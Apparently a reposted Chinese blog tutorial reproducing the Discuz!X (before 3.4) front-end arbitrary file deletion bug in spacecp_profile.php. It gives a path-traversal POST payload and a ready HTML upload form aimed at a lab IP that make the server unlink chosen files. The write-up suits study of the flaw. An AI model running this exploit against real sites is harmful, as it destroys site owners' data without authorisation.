码迷,mamicode.com
首页 > Web开发 > 详细

Discuz!X前台任意文件删除漏洞重现

时间:2020-02-24 22:20:06      阅读:122      评论:0      收藏:0      [点我收藏+]

标签:刷新   discuz   action   cti   img   bar   rcm   data   aaaaaa   

漏洞影响了Discuz 3.4 以下的所有版本。
该漏洞存在于upload/source/include/spacecp/spacecp_profile.php,文件中的submitcheck()函数。成功上传文件会跳转执行unlink这个函数。


1.进入设置-个人资料,先在页面源代码找到formhash值,可以看到值为2599b5e5

技术图片

2.开启一个插件Hackbar
Post数据:birthprovince=../../../importantfile.txt&profilesubmit=1&formhash=2599b5e5

技术图片

执行后会显示一片空白,你再刷新下或重新访问下就好了。
技术图片
技术图片

3.出生地被修改成要删除的文件。
最后构造表单执行删除文件

<form
action="http://192.168.199.217/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="720c16c3"/></p>
<input type="text" name="profilesubmit" value="1"/></p>
<input type="submit" value="Submit" />
</from>

技术图片

生成.html,上面的需要自己修改。
4.然后随便上传一张图片,就能删除自己要删除的。

技术图片

5.再访问回去看一下。

技术图片

Discuz!X前台任意文件删除漏洞重现

标签:刷新   discuz   action   cti   img   bar   rcm   data   aaaaaa   

原文地址:https://blog.51cto.com/14259169/2473183

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!